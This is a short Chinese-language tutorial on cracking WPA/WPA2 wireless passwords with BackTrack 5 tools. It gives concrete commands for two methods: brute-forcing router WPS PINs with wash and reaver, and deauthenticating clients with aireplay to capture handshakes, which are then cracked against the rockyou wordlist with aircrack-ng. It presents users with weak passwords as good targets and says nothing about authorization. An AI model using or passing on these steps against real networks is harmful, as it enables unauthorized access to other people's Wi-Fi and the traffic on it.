WPA/WPA2加密破解

WPA/WPA2无线密码破解这里主要介绍两种方法：穷举PIN码、穷举密码

穷举PIN码(共11000种组合)破解速度快，需要一些条件（路由器支持WPS、QSS功能），路由器信号良好。无论密码多复杂，条件适宜可用PIN码秒破。

穷举密码需要强大的字典支持，复杂的密码，字典无收录，则无法破解成功。针对广大安全意识不强的弱口令用户不失为一佳选择。

破解前，请开启无线网卡混杂模式（参考BackTrack 5无线网卡混杂模式设置）

1.穷举PIN码

用wash -i mon0 -C查看周围支持WPS(可穷举PIN码条件)的路由器

图示RSSI为信号强度（-60左右属于信号良好/-40左右为信号优）

选取适宜的目标路由器，记录MAC地址

用reaver -i mon0 -b MAC地址 -S -a -vv -n进行PIN穷举

-S -a 是优化参数，用于保存穷举进度

-vv是显示穷举进度详细内容（详情请查阅reaver参数帮助）

上图所示为正常穷举破解过程

上图所示为失败情况，通过加-n、-N参数或停止一段时间再试

获取路由器PIN码后可以直接加上-p PIN码 参数实现秒破密码

---

2.穷举密码(跑字典)

命令airodump-ng --bssid MAC地址 -c 信道 -w 保存数据文件名 用于捕获路由器与客户端的数据包

命令aireplay -0 10 -a MAC地址 -c 客户端MAC mon0 用于进行冲突攻击，迫使客户端掉线，以达到捕获握手包的目的

重复进行冲突攻击，直至出现图示红色标记区域字样(表示已经捕获握手包)

命令aircrack-ng -w 字典文件 保存数据文件名 进行跑字典破解密码

BackTrack 5自带弱口令字典/pentest/passwords/wordlists/rockyou.txt

图示为用自带字典弱口令密码破解成功